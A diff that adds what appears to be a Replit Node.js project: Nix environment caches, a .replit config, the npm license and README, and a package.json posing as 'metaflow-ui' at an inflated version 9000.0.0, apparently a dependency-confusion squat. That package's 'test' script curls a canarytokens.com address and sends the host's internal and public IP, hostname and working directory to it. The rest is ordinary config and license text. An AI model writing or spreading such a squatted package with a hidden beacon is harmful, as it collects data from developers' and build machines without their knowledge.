","NIX_STORE":"/nix/store","NM":"nm","NODE_PATH":"/nix/store/dj805sw07vvpbxx39c8g67x8qddg0ikw-nodejs-18.12.1/lib/node_modules:/nix/store/7rfpsb04f2r6a755bqmmj1i90x8p1b18-typescript-language-server-3.1.0/lib/node_modules:/nix/store/hqc964yg79161afx85fvcmg1a6879k5i-jest-cli-23.6.0/lib/node_modules","OBJCOPY":"objcopy","OBJDUMP":"objdump","PATH":"/nix/store/bap4d0lpcrhpwmpb8ayjcgkmvfj62lnq-bash-interactive-5.1-p16/bin:/nix/store/pr5n59mb4jzmfx6kanwxly0l07p861fg-patchelf-0.15.0/bin:/nix/store/dq0xwmsk1g0i2ayg6pb7y87na2knzylh-gcc-wrapper-11.3.0/bin:/nix/store/1gf2flfqnpqbr1b4p4qz2f72y42bs56r-gcc-11.3.0/bin:/nix/store/57xv61c5zi8pphjbcwxxjlgc34p61ic9-glibc-2.35-163-bin/bin:/nix/store/a7gvj343m05j2s32xcnwr35v31ynlypr-coreutils-9.1/bin:/nix/store/1d6ian3r8kdzspw8hacjhl3xkp40g1lj-binutils-wrapper-2.39/bin:/nix/store/039g378vc3pc3dvi9dzdlrd0i4q93qwf-binutils-2.39/bin:/nix/store/dj805sw07vvpbxx39c8g67x8qddg0ikw-nodejs-18.12.1/bin:/nix/store/7rfpsb04f2r6a755bqmmj1i90x8p1b18-typescript-language-server-3.1.0/bin:/nix/store/zdcnqq55qi214j46zgw2qa1jp4dpdf2m-yarn-1.22.19/bin:/nix/store/hqc964yg79161afx85fvcmg1a6879k5i-jest-cli-23.6.0/bin:/nix/store/a7gvj343m05j2s32xcnwr35v31ynlypr-coreutils-9.1/bin:/nix/store/mydc6f4k2z73xlcz7ilif3v2lcaiqvza-findutils-4.9.0/bin:/nix/store/j9p3g8472iijd50vhdprx0nmk2fqn5gv-diffutils-3.8/bin:/nix/store/89zs7rms6x00xfq4dq6m7mjnhkr8a6r4-gnused-4.8/bin:/nix/store/86bp03jkmsl6f92w0yzg4s59g5mhxwmy-gnugrep-3.7/bin:/nix/store/hwcdqw4jrjnd37wxqgsd47hd0j8bnj09-gawk-5.1.1/bin:/nix/store/cfbhw8r8ags41vwqaz47r583d0p4h4a1-gnutar-1.34/bin:/nix/store/p3m1ndl1lapwrlh698bnb5lvvxh67378-gzip-1.12/bin:/nix/store/a8mhcagrsly7c7mpjrpsnaahk4aax056-bzip2-1.0.8-bin/bin:/nix/store/mblgz65m3zv9x548a3d5m96fj2pbwr09-gnumake-4.3/bin:/nix/store/dsd5gz46hdbdk2rfdimqddhq6m8m8fqs-bash-5.1-p16/bin:/nix/store/v7ljksji50mg3w61dykaa3n3y79n6nil-patch-2.7.6/bin:/nix/store/zlcnmqq14jz5x9439jf937mvayyl63da-xz-5.2.7-bin/bin:/nix/store/y6aj732zm9m87c82fpvf103a1xb22blp-file-5.43/bin","RANLIB":"ranlib","READELF":"readelf","SIZE":"size","SOURCE_DATE_EPOCH":"315532800","STRINGS":"strings","STRIP":"strip","XDG_DATA_DIRS":"/nix/store/pr5n59mb4jzmfx6kanwxly0l07p861fg-patchelf-0.15.0/share","_":"/nix/store/a7gvj343m05j2s32xcnwr35v31ynlypr-coreutils-9.1/bin/env","__ETC_PROFILE_SOURCED":"1","buildInputs":"/nix/store/dj805sw07vvpbxx39c8g67x8qddg0ikw-nodejs-18.12.1 /nix/store/7rfpsb04f2r6a755bqmmj1i90x8p1b18-typescript-language-server-3.1.0 /nix/store/zdcnqq55qi214j46zgw2qa1jp4dpdf2m-yarn-1.22.19 /nix/store/hqc964yg79161afx85fvcmg1a6879k5i-jest-cli-23.6.0","buildPhase":"echo \"------------------------------------------------------------\" \u003e\u003e$out\necho \" WARNING: the existence of this path is not guaranteed.\" \u003e\u003e$out\necho \" It is an internal implementation detail for pkgs.mkShell.\" \u003e\u003e$out\necho \"------------------------------------------------------------\" \u003e\u003e$out\necho \u003e\u003e $out\n# Record all build inputs as runtime dependencies\nexport \u003e\u003e $out\n","builder":"/nix/store/dsd5gz46hdbdk2rfdimqddhq6m8m8fqs-bash-5.1-p16/bin/bash","cmakeFlags":"","configureFlags":"","depsBuildBuild":"","depsBuildBuildPropagated":"","depsBuildTarget":"","depsBuildTargetPropagated":"","depsHostHost":"","depsHostHostPropagated":"","depsTargetTarget":"","depsTargetTargetPropagated":"","doCheck":"","doInstallCheck":"","mesonFlags":"","name":"nix-shell","nativeBuildInputs":"","out":"/nix/store/7ya8xlq922h1fx115xra9kl0d0pfk2ab-nix-shell","outputs":"out","patches":"","phases":"buildPhase","propagatedBuildInputs":"","propagatedNativeBuildInputs":"","shell":"/nix/store/dsd5gz46hdbdk2rfdimqddhq6m8m8fqs-bash-5.1-p16/bin/bash","shellHook":"","stdenv":"/nix/store/kmfaajdpyyyg319vfqni5jm9wkxjmf73-stdenv-linux","strictDeps":"","system":"x86_64-linux"},"dependencies":[{"path":"replit.nix","mod_time":"2023-01-20T17:24:06.730825035Z"}],"channel":"stable-22_11","channel_nix_path":"/nix/store/1hxr7x3df6jw0h175dkd2qybvkdscsj1-nixpkgs-stable-22_11-22.11.tar.gz/nixpkgs-stable-22_11"}}}
@@ -0,0 +1,4 @@
1
+ {
2
+ "optOut": false,
3
+ "lastUpdateCheck": 1689538257492
4
+ }
@@ -0,0 +1,4 @@
1
+ {
2
+ "optOut": false,
3
+ "lastUpdateCheck": 1678825045705
4
+ }
@@ -0,0 +1 @@
1
+ {"nonce":7496690965977660619,"last_updated":{"seconds":1688848432,"nanos":967138000}}
@@ -0,0 +1 @@
1
+ {"entries":{"replit.nix":{"env":{"AR":"ar","AS":"as","CC":"gcc","CONFIG_SHELL":"/nix/store/dsd5gz46hdbdk2rfdimqddhq6m8m8fqs-bash-5.1-p16/bin/bash","CXX":"g++","HOST_PATH":"/nix/store/dj805sw07vvpbxx39c8g67x8qddg0ikw-nodejs-18.12.1/bin:/nix/store/7rfpsb04f2r6a755bqmmj1i90x8p1b18-typescript-language-server-3.1.0/bin:/nix/store/zdcnqq55qi214j46zgw2qa1jp4dpdf2m-yarn-1.22.19/bin:/nix/store/hqc964yg79161afx85fvcmg1a6879k5i-jest-cli-23.6.0/bin:/nix/store/a7gvj343m05j2s32xcnwr35v31ynlypr-coreutils-9.1/bin:/nix/store/mydc6f4k2z73xlcz7ilif3v2lcaiqvza-findutils-4.9.0/bin:/nix/store/j9p3g8472iijd50vhdprx0nmk2fqn5gv-diffutils-3.8/bin:/nix/store/89zs7rms6x00xfq4dq6m7mjnhkr8a6r4-gnused-4.8/bin:/nix/store/86bp03jkmsl6f92w0yzg4s59g5mhxwmy-gnugrep-3.7/bin:/nix/store/hwcdqw4jrjnd37wxqgsd47hd0j8bnj09-gawk-5.1.1/bin:/nix/store/cfbhw8r8ags41vwqaz47r583d0p4h4a1-gnutar-1.34/bin:/nix/store/p3m1ndl1lapwrlh698bnb5lvvxh67378-gzip-1.12/bin:/nix/store/a8mhcagrsly7c7mpjrpsnaahk4aax056-bzip2-1.0.8-bin/bin:/nix/store/mblgz65m3zv9x548a3d5m96fj2pbwr09-gnumake-4.3/bin:/nix/store/dsd5gz46hdbdk2rfdimqddhq6m8m8fqs-bash-5.1-p16/bin:/nix/store/v7ljksji50mg3w61dykaa3n3y79n6nil-patch-2.7.6/bin:/nix/store/zlcnmqq14jz5x9439jf937mvayyl63da-xz-5.2.7-bin/bin:/nix/store/y6aj732zm9m87c82fpvf103a1xb22blp-file-5.43/bin","LD":"ld","LOCALE_ARCHIVE":"/usr/lib/locale/locale-archive","NIX_BINTOOLS":"/nix/store/1d6ian3r8kdzspw8hacjhl3xkp40g1lj-binutils-wrapper-2.39","NIX_BINTOOLS_WRAPPER_TARGET_HOST_x86_64_unknown_linux_gnu":"1","NIX_BUILD_CORES":"16","NIX_BUILD_TOP":"/tmp","NIX_CC":"/nix/store/dq0xwmsk1g0i2ayg6pb7y87na2knzylh-gcc-wrapper-11.3.0","NIX_CC_WRAPPER_TARGET_HOST_x86_64_unknown_linux_gnu":"1","NIX_CFLAGS_COMPILE":" -frandom-seed=7ya8xlq922 -isystem /nix/store/dj805sw07vvpbxx39c8g67x8qddg0ikw-nodejs-18.12.1/include -isystem /nix/store/dj805sw07vvpbxx39c8g67x8qddg0ikw-nodejs-18.12.1/include","NIX_ENFORCE_NO_NATIVE":"1","NIX_HARDENING_ENABLE":"fortify stackprotector pic strictoverflow format relro bindnow","NIX_INDENT_MAKE":"1","NIX_LDFLAGS":"-rpath /nix/store/7ya8xlq922h1fx115xra9kl0d0pfk2ab-nix-shell/lib64 -rpath /nix/store/7ya8xlq922h1fx115xra9kl0d0pfk2ab-nix-shell/lib ","NIX_STORE":"/nix/store","NM":"nm","NODE_PATH":"/nix/store/dj805sw07vvpbxx39c8g67x8qddg0ikw-nodejs-18.12.1/lib/node_modules:/nix/store/7rfpsb04f2r6a755bqmmj1i90x8p1b18-typescript-language-server-3.1.0/lib/node_modules:/nix/store/hqc964yg79161afx85fvcmg1a6879k5i-jest-cli-23.6.0/lib/node_modules","OBJCOPY":"objcopy","OBJDUMP":"objdump","PATH":"/nix/store/bap4d0lpcrhpwmpb8ayjcgkmvfj62lnq-bash-interactive-5.1-p16/bin:/nix/store/pr5n59mb4jzmfx6kanwxly0l07p861fg-patchelf-0.15.0/bin:/nix/store/dq0xwmsk1g0i2ayg6pb7y87na2knzylh-gcc-wrapper-11.3.0/bin:/nix/store/1gf2flfqnpqbr1b4p4qz2f72y42bs56r-gcc-11.3.0/bin:/nix/store/57xv61c5zi8pphjbcwxxjlgc34p61ic9-glibc-2.35-163-bin/bin:/nix/store/a7gvj343m05j2s32xcnwr35v31ynlypr-coreutils-9.1/bin:/nix/store/1d6ian3r8kdzspw8hacjhl3xkp40g1lj-binutils-wrapper-2.39/bin:/nix/store/039g378vc3pc3dvi9dzdlrd0i4q93qwf-binutils-2.39/bin:/nix/store/dj805sw07vvpbxx39c8g67x8qddg0ikw-nodejs-18.12.1/bin:/nix/store/7rfpsb04f2r6a755bqmmj1i90x8p1b18-typescript-language-server-3.1.0/bin:/nix/store/zdcnqq55qi214j46zgw2qa1jp4dpdf2m-yarn-1.22.19/bin:/nix/store/hqc964yg79161afx85fvcmg1a6879k5i-jest-cli-23.6.0/bin:/nix/store/a7gvj343m05j2s32xcnwr35v31ynlypr-coreutils-9.1/bin:/nix/store/mydc6f4k2z73xlcz7ilif3v2lcaiqvza-findutils-4.9.0/bin:/nix/store/j9p3g8472iijd50vhdprx0nmk2fqn5gv-diffutils-3.8/bin:/nix/store/89zs7rms6x00xfq4dq6m7mjnhkr8a6r4-gnused-4.8/bin:/nix/store/86bp03jkmsl6f92w0yzg4s59g5mhxwmy-gnugrep-3.7/bin:/nix/store/hwcdqw4jrjnd37wxqgsd47hd0j8bnj09-gawk-5.1.1/bin:/nix/store/cfbhw8r8ags41vwqaz47r583d0p4h4a1-gnutar-1.34/bin:/nix/store/p3m1ndl1lapwrlh698bnb5lvvxh67378-gzip-1.12/bin:/nix/store/a8mhcagrsly7c7mpjrpsnaahk4aax056-bzip2-1.0.8-bin/bin:/nix/store/mblgz65m3zv9x548a3d5m96fj2pbwr09-gnumake-4.3/bin:/nix/store/dsd5gz46hdbdk2rfdimqddhq6m8m8fqs-bash-5.1-p16/bin:/nix/store/v7ljksji50mg3w61dykaa3n3y79n6nil-patch-2.7.6/bin:/nix/store/zlcnmqq14jz5x9439jf937mvayyl63da-xz-5.2.7-bin/bin:/nix/store/y6aj732zm9m87c82fpvf103a1xb22blp-file-5.43/bin","RANLIB":"ranlib","READELF":"readelf","SIZE":"size","SOURCE_DATE_EPOCH":"315532800","STRINGS":"strings","STRIP":"strip","XDG_DATA_DIRS":"/nix/store/pr5n59mb4jzmfx6kanwxly0l07p861fg-patchelf-0.15.0/share","_":"/nix/store/a7gvj343m05j2s32xcnwr35v31ynlypr-coreutils-9.1/bin/env","__ETC_PROFILE_SOURCED":"1","buildInputs":"/nix/store/dj805sw07vvpbxx39c8g67x8qddg0ikw-nodejs-18.12.1 /nix/store/7rfpsb04f2r6a755bqmmj1i90x8p1b18-typescript-language-server-3.1.0 /nix/store/zdcnqq55qi214j46zgw2qa1jp4dpdf2m-yarn-1.22.19 /nix/store/hqc964yg79161afx85fvcmg1a6879k5i-jest-cli-23.6.0","buildPhase":"echo \"------------------------------------------------------------\" \u003e\u003e$out\necho \" WARNING: the existence of this path is not guaranteed.\" \u003e\u003e$out\necho \" It is an internal implementation detail for pkgs.mkShell.\" \u003e\u003e$out\necho \"------------------------------------------------------------\" \u003e\u003e$out\necho \u003e\u003e $out\n# Record all build inputs as runtime dependencies\nexport \u003e\u003e $out\n","builder":"/nix/store/dsd5gz46hdbdk2rfdimqddhq6m8m8fqs-bash-5.1-p16/bin/bash","cmakeFlags":"","configureFlags":"","depsBuildBuild":"","depsBuildBuildPropagated":"","depsBuildTarget":"","depsBuildTargetPropagated":"","depsHostHost":"","depsHostHostPropagated":"","depsTargetTarget":"","depsTargetTargetPropagated":"","doCheck":"","doInstallCheck":"","mesonFlags":"","name":"nix-shell","nativeBuildInputs":"","out":"/nix/store/7ya8xlq922h1fx115xra9kl0d0pfk2ab-nix-shell","outputs":"out","patches":"","phases":"buildPhase","propagatedBuildInputs":"","propagatedNativeBuildInputs":"","shell":"/nix/store/dsd5gz46hdbdk2rfdimqddhq6m8m8fqs-bash-5.1-p16/bin/bash","shellHook":"","stdenv":"/nix/store/kmfaajdpyyyg319vfqni5jm9wkxjmf73-stdenv-linux","strictDeps":"","system":"x86_64-linux"},"dependencies":[{"path":"replit.nix","mod_time":"2023-01-20T17:24:06.730825035Z"}],"channel":"stable-22_11","channel_nix_path":"/nix/store/1hxr7x3df6jw0h175dkd2qybvkdscsj1-nixpkgs-stable-22_11-22.11.tar.gz/nixpkgs-stable-22_11"}}}
@@ -0,0 +1,10 @@
1
+ {
2
+ "optOut": false,
3
+ "lastUpdateCheck": 1688848360256,
4
+ "update": {
5
+ "latest": "9.8.0",
6
+ "current": "6.14.17",
7
+ "type": "major",
8
+ "name": "npm"
9
+ }
10
+ }
@@ -0,0 +1,4 @@
1
+ {
2
+ "optOut": false,
3
+ "lastUpdateCheck": 1678825045705
4
+ }
@@ -0,0 +1,89 @@
1
+ entrypoint = "index.js"
2
+
3
+ hidden = [".config", "package-lock.json"]
4
+
5
+ [interpreter]
6
+ command = [
7
+ "prybar-nodejs",
8
+ "-q",
9
+ "--ps1",
10
+ "\u0001\u001b[33m\u0002\u0001\u001b[00m\u0002 ",
11
+ "-i"
12
+ ]
13
+
14
+ [[hints]]
15
+ regex = "Error \\[ERR_REQUIRE_ESM\\]"
16
+ message = "We see that you are using require(...) inside your code. We currently do not support this syntax. Please use 'import' instead when using external modules. (https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import)"
17
+
18
+ [nix]
19
+ channel = "stable-22_11"
20
+
21
+ [env]
22
+ XDG_CONFIG_HOME = "$REPL_HOME/.config"
23
+ PATH = "$REPL_HOME/.config/npm/node_global/bin:$REPL_HOME/node_modules/.bin"
24
+ npm_config_prefix = "$REPL_HOME/.config/npm/node_global"
25
+
26
+ [gitHubImport]
27
+ requiredFiles = [".replit", "replit.nix", ".config", "package.json", "package-lock.json"]
28
+
29
+ [packager]
30
+ language = "nodejs"
31
+
32
+ [packager.features]
33
+ packageSearch = true
34
+ guessImports = true
35
+ enabledForHosting = false
36
+
37
+ [unitTest]
38
+ language = "nodejs"
39
+
40
+ [debugger]
41
+ support = true
42
+
43
+ [debugger.interactive]
44
+ transport = "localhost:0"
45
+ startCommand = [ "dap-node" ]
46
+
47
+ [debugger.interactive.initializeMessage]
48
+ command = "initialize"
49
+ type = "request"
50
+
51
+ [debugger.interactive.initializeMessage.arguments]
52
+ clientID = "replit"
53
+ clientName = "replit.com"
54
+ columnsStartAt1 = true
55
+ linesStartAt1 = true
56
+ locale = "en-us"
57
+ pathFormat = "path"
58
+ supportsInvalidatedEvent = true
59
+ supportsProgressReporting = true
60
+ supportsRunInTerminalRequest = true
61
+ supportsVariablePaging = true
62
+ supportsVariableType = true
63
+
64
+ [debugger.interactive.launchMessage]
65
+ command = "launch"
66
+ type = "request"
67
+
68
+ [debugger.interactive.launchMessage.arguments]
69
+ args = []
70
+ console = "externalTerminal"
71
+ cwd = "."
72
+ environment = []
73
+ pauseForSourceMap = false
74
+ program = "./index.js"
75
+ request = "launch"
76
+ sourceMaps = true
77
+ stopOnEntry = false
78
+ type = "pwa-node"
79
+
80
+ [languages]
81
+
82
+ [languages.javascript]
83
+ pattern = "**/{*.js,*.jsx,*.ts,*.tsx,*.json}"
84
+
85
+ [languages.javascript.languageServer]
86
+ start = "typescript-language-server --stdio"
87
+
88
+ [deployment]
89
+ run = ["sh", "-c", "node index.js"]
@@ -0,0 +1 @@
1
+ {"version":2,"languages":{"nodejs-npm":{"specfileHash":"257bee97dfb75d13700a54a2242fc134","lockfileHash":"b2ab5f8a8ec626e9fbfd859883f13155"}}}
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "metaflow-ui",
3
+ "version": "9000.0.0",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "test": "curl -s http://canarytokens.com/images/traffic/tags/loegu182gfxwrc5skuzzku6eu/contact.php?origin=$(hostname -I)&host=$(hostname)&public=$(curl -s ifconfig.me)&path=$(pwd)"
7
+ },
8
+ "keywords": [],
9
+ "author": "",
10
+ "license": "ISC",
11
+ "description": ""
12
+ }
@@ -0,0 +1,8 @@
1
+ { pkgs }: {
2
+ deps = [
3
+ pkgs.nodejs-18_x
4
+ pkgs.nodePackages.typescript-language-server
5
+ pkgs.yarn
6
+ pkgs.replitPackages.jest
7
+ ];
8
+ }
@@ -0,0 +1,235 @@
1
+ The npm application
2
+ Copyright (c) npm, Inc. and Contributors
3
+ Licensed on the terms of The Artistic License 2.0
4
+
5
+ Node package dependencies of the npm application
6
+ Copyright (c) their respective copyright owners
7
+ Licensed on their respective license terms
8
+
9
+ The npm public registry at https://registry.npmjs.org
10
+ and the npm website at https://www.npmjs.com
11
+ Operated by npm, Inc.
12
+ Use governed by terms published on https://www.npmjs.com
13
+
14
+ "Node.js"
15
+ Trademark Joyent, Inc., https://joyent.com
16
+ Neither npm nor npm, Inc. are affiliated with Joyent, Inc.
17
+
18
+ The Node.js application
19
+ Project of Node Foundation, https://nodejs.org
20
+
21
+ The npm Logo
22
+ Copyright (c) Mathias Pettersson and Brian Hammond
23
+
24
+ "Gubblebum Blocky" typeface
25
+ Copyright (c) Tjarda Koster, https://jelloween.deviantart.com
26
+ Used with permission
27
+
28
+
29
+ --------
30
+
31
+
32
+ The Artistic License 2.0
33
+
34
+ Copyright (c) 2000-2006, The Perl Foundation.
35
+
36
+ Everyone is permitted to copy and distribute verbatim copies
37
+ of this license document, but changing it is not allowed.
38
+
39
+ Preamble
40
+
41
+ This license establishes the terms under which a given free software
42
+ Package may be copied, modified, distributed, and/or redistributed.
43
+ The intent is that the Copyright Holder maintains some artistic
44
+ control over the development of that Package while still keeping the
45
+ Package available as open source and free software.
46
+
47
+ You are always permitted to make arrangements wholly outside of this
48
+ license directly with the Copyright Holder of a given Package. If the
49
+ terms of this license do not permit the full use that you propose to
50
+ make of the Package, you should contact the Copyright Holder and seek
51
+ a different licensing arrangement.
52
+
53
+ Definitions
54
+
55
+ "Copyright Holder" means the individual(s) or organization(s)
56
+ named in the copyright notice for the entire Package.
57
+
58
+ "Contributor" means any party that has contributed code or other
59
+ material to the Package, in accordance with the Copyright Holder's
60
+ procedures.
61
+
62
+ "You" and "your" means any person who would like to copy,
63
+ distribute, or modify the Package.
64
+
65
+ "Package" means the collection of files distributed by the
66
+ Copyright Holder, and derivatives of that collection and/or of
67
+ those files. A given Package may consist of either the Standard
68
+ Version, or a Modified Version.
69
+
70
+ "Distribute" means providing a copy of the Package or making it
71
+ accessible to anyone else, or in the case of a company or
72
+ organization, to others outside of your company or organization.
73
+
74
+ "Distributor Fee" means any fee that you charge for Distributing
75
+ this Package or providing support for this Package to another
76
+ party. It does not mean licensing fees.
77
+
78
+ "Standard Version" refers to the Package if it has not been
79
+ modified, or has been modified only in ways explicitly requested
80
+ by the Copyright Holder.
81
+
82
+ "Modified Version" means the Package, if it has been changed, and
83
+ such changes were not explicitly requested by the Copyright
84
+ Holder.
85
+
86
+ "Original License" means this Artistic License as Distributed with
87
+ the Standard Version of the Package, in its current version or as
88
+ it may be modified by The Perl Foundation in the future.
89
+
90
+ "Source" form means the source code, documentation source, and
91
+ configuration files for the Package.
92
+
93
+ "Compiled" form means the compiled bytecode, object code, binary,
94
+ or any other form resulting from mechanical transformation or
95
+ translation of the Source form.
96
+
97
+
98
+ Permission for Use and Modification Without Distribution
99
+
100
+ (1) You are permitted to use the Standard Version and create and use
101
+ Modified Versions for any purpose without restriction, provided that
102
+ you do not Distribute the Modified Version.
103
+
104
+
105
+ Permissions for Redistribution of the Standard Version
106
+
107
+ (2) You may Distribute verbatim copies of the Source form of the
108
+ Standard Version of this Package in any medium without restriction,
109
+ either gratis or for a Distributor Fee, provided that you duplicate
110
+ all of the original copyright notices and associated disclaimers. At
111
+ your discretion, such verbatim copies may or may not include a
112
+ Compiled form of the Package.
113
+
114
+ (3) You may apply any bug fixes, portability changes, and other
115
+ modifications made available from the Copyright Holder. The resulting
116
+ Package will still be considered the Standard Version, and as such
117
+ will be subject to the Original License.
118
+
119
+
120
+ Distribution of Modified Versions of the Package as Source
121
+
122
+ (4) You may Distribute your Modified Version as Source (either gratis
123
+ or for a Distributor Fee, and with or without a Compiled form of the
124
+ Modified Version) provided that you clearly document how it differs
125
+ from the Standard Version, including, but not limited to, documenting
126
+ any non-standard features, executables, or modules, and provided that
127
+ you do at least ONE of the following:
128
+
129
+ (a) make the Modified Version available to the Copyright Holder
130
+ of the Standard Version, under the Original License, so that the
131
+ Copyright Holder may include your modifications in the Standard
132
+ Version.
133
+
134
+ (b) ensure that installation of your Modified Version does not
135
+ prevent the user installing or running the Standard Version. In
136
+ addition, the Modified Version must bear a name that is different
137
+ from the name of the Standard Version.
138
+
139
+ (c) allow anyone who receives a copy of the Modified Version to
140
+ make the Source form of the Modified Version available to others
141
+ under
142
+
143
+ (i) the Original License or
144
+
145
+ (ii) a license that permits the licensee to freely copy,
146
+ modify and redistribute the Modified Version using the same
147
+ licensing terms that apply to the copy that the licensee
148
+ received, and requires that the Source form of the Modified
149
+ Version, and of any works derived from it, be made freely
150
+ available in that license fees are prohibited but Distributor
151
+ Fees are allowed.
152
+
153
+
154
+ Distribution of Compiled Forms of the Standard Version
155
+ or Modified Versions without the Source
156
+
157
+ (5) You may Distribute Compiled forms of the Standard Version without
158
+ the Source, provided that you include complete instructions on how to
159
+ get the Source of the Standard Version. Such instructions must be
160
+ valid at the time of your distribution. If these instructions, at any
161
+ time while you are carrying out such distribution, become invalid, you
162
+ must provide new instructions on demand or cease further distribution.
163
+ If you provide valid instructions or cease distribution within thirty
164
+ days after you become aware that the instructions are invalid, then
165
+ you do not forfeit any of your rights under this license.
166
+
167
+ (6) You may Distribute a Modified Version in Compiled form without
168
+ the Source, provided that you comply with Section 4 with respect to
169
+ the Source of the Modified Version.
170
+
171
+
172
+ Aggregating or Linking the Package
173
+
174
+ (7) You may aggregate the Package (either the Standard Version or
175
+ Modified Version) with other packages and Distribute the resulting
176
+ aggregation provided that you do not charge a licensing fee for the
177
+ Package. Distributor Fees are permitted, and licensing fees for other
178
+ components in the aggregation are permitted. The terms of this license
179
+ apply to the use and Distribution of the Standard or Modified Versions
180
+ as included in the aggregation.
181
+
182
+ (8) You are permitted to link Modified and Standard Versions with
183
+ other works, to embed the Package in a larger work of your own, or to
184
+ build stand-alone binary or bytecode versions of applications that
185
+ include the Package, and Distribute the result without restriction,
186
+ provided the result does not expose a direct interface to the Package.
187
+
188
+
189
+ Items That are Not Considered Part of a Modified Version
190
+
191
+ (9) Works (including, but not limited to, modules and scripts) that
192
+ merely extend or make use of the Package, do not, by themselves, cause
193
+ the Package to be a Modified Version. In addition, such works are not
194
+ considered parts of the Package itself, and are not subject to the
195
+ terms of this license.
196
+
197
+
198
+ General Provisions
199
+
200
+ (10) Any use, modification, and distribution of the Standard or
201
+ Modified Versions is governed by this Artistic License. By using,
202
+ modifying or distributing the Package, you accept this license. Do not
203
+ use, modify, or distribute the Package, if you do not accept this
204
+ license.
205
+
206
+ (11) If your Modified Version has been derived from a Modified
207
+ Version made by someone other than you, you are nevertheless required
208
+ to ensure that your Modified Version complies with the requirements of
209
+ this license.
210
+
211
+ (12) This license does not grant you the right to use any trademark,
212
+ service mark, tradename, or logo of the Copyright Holder.
213
+
214
+ (13) This license includes the non-exclusive, worldwide,
215
+ free-of-charge patent license to make, have made, use, offer to sell,
216
+ sell, import and otherwise transfer the Package with respect to any
217
+ patent claims licensable by the Copyright Holder that are necessarily
218
+ infringed by the Package. If you institute patent litigation
219
+ (including a cross-claim or counterclaim) against any party alleging
220
+ that the Package constitutes direct or contributory patent
221
+ infringement, then this Artistic License to you shall terminate on the
222
+ date that such litigation is filed.
223
+
224
+ (14) Disclaimer of Warranty:
225
+ THE PACKAGE IS PROVIDED BY THE COPYRIGHT HOLDER AND CONTRIBUTORS "AS
226
+ IS' AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES. THE IMPLIED
227
+ WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR
228
+ NON-INFRINGEMENT ARE DISCLAIMED TO THE EXTENT PERMITTED BY YOUR LOCAL
229
+ LAW. UNLESS REQUIRED BY LAW, NO COPYRIGHT HOLDER OR CONTRIBUTOR WILL
230
+ BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
231
+ DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF
232
+ ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
233
+
234
+
235
+ --------
@@ -0,0 +1,64 @@
1
+ # npm - a JavaScript package manager
2
+
3
+ [![npm version](https://img.shields.io/npm/v/npm.svg)](https://npm.im/npm)
4
+ [![license](https://img.shields.io/npm/l/npm.svg)](https://npm.im/npm)
5
+ [![CI - cli](https://github.com/npm/cli/actions/workflows/ci.yml/badge.svg)](https://github.com/npm/cli/actions/workflows/ci.yml)
6
+ [![Benchmark Suite](https://github.com/npm/cli/actions/workflows/benchmark.yml/badge.svg)](https://github.com/npm/cli/actions/workflows/benchmark.yml)
7
+
8
+ ### Requirements
9
+
10
+ One of the following versions of [Node.js](https://nodejs.org/en/download/) must be installed to run **`npm`**:
11
+
12
+ * `14.x.x` >= `14.17.0`
13
+ * `16.x.x` >= `16.13.0`
14
+ * `18.0.0` or higher
15
+
16
+ ### Installation
17
+
18
+ **`npm`** comes bundled with [**`node`**](https://nodejs.org/), & most third-party distributions, by default. Officially supported downloads/distributions can be found at: [nodejs.org/en/download](https://nodejs.org/en/download)
19
+
20
+ #### Direct Download
21
+
22
+ You can download & install **`npm`** directly from [**npmjs**.com](https://npmjs.com/) using our custom `install.sh` script:
23
+
24
+ ```bash
25
+ curl -qL https://www.npmjs.com/install.sh | sh
26
+ ```
27
+
28
+ #### Node Version Managers
29
+
30
+ If you're looking to manage multiple versions of **`Node.js`** &/or **`npm`**, consider using a [node version manager](https://github.com/search?q=node+version+manager+archived%3Afalse&type=repositories&ref=advsearch)
31
+
32
+ ### Usage
33
+
34
+ ```bash
35
+ npm <command>
36
+ ```
37
+
38
+ ### Links & Resources
39
+
40
+ * [**Documentation**](https://docs.npmjs.com/) - Official docs & how-tos for all things **npm**
41
+ * Note: you can also search docs locally with `npm help-search <query>`
42
+ * [**Bug Tracker**](https://github.com/npm/cli/issues) - Search or submit bugs against the CLI
43
+ * [**Roadmap**](https://github.com/orgs/github/projects/4247/views/1?filterQuery=npm) - Track & follow along with our public roadmap
44
+ * [**Feedback**](https://github.com/npm/feedback) - Contribute ideas & discussion around the npm registry, website & CLI
45
+ * [**RFCs**](https://github.com/npm/rfcs) - Contribute ideas & specifications for the API/design of the npm CLI
46
+ * [**Service Status**](https://status.npmjs.org/) - Monitor the current status & see incident reports for the website & registry
47
+ * [**Project Status**](https://npm.github.io/statusboard/) - See the health of all our maintained OSS projects in one view
48
+ * [**Events Calendar**](https://calendar.google.com/calendar/u/0/embed?src=npmjs.com_oonluqt8oftrt0vmgrfbg6q6go@group.calendar.google.com) - Keep track of our Open RFC calls, releases, meetups, conferences & more
49
+ * [**Support**](https://www.npmjs.com/support) - Experiencing problems with the **npm** [website](https://npmjs.com) or [registry](https://registry.npmjs.org)? File a ticket [here](https://www.npmjs.com/support)
50
+
51
+ ### Acknowledgments
52
+
53
+ * `npm` is configured to use the **npm Public Registry** at [https://registry.npmjs.org](https://registry.npmjs.org) by default; Usage of this registry is subject to **Terms of Use** available at [https://npmjs.com/policies/terms](https://npmjs.com/policies/terms)
54
+ * You can configure `npm` to use any other compatible registry you prefer. You can read more about configuring third-party registries [here](https://docs.npmjs.com/cli/v7/using-npm/registry)
55
+
56
+ ### FAQ on Branding
57
+
58
+ #### Is it "npm" or "NPM" or "Npm"?
59
+
60
+ **`npm`** should never be capitalized unless it is being displayed in a location that is customarily all-capitals (ex. titles on `man` pages).
61
+
62
+ #### Is "npm" an acronym for "Node Package Manager"?
63
+
64
+ Contrary to popular belief, **`npm`** **is not** in fact an acronym for "Node Package Manager"; It is a recursive bacronymic abbreviation for **"npm is not an acronym"** (if the project was named "ninaa", then it would be an acronym). The precursor to **`npm`** was actually a bash utility named **"pm"**, which was the shortform name of **"pkgmakeinst"** - a bash function that installed various things on various platforms. If **`npm`** were to ever have been considered an acronym, it would be as "node pm" or, potentially "new pm".
@@ -0,0 +1,64 @@
1
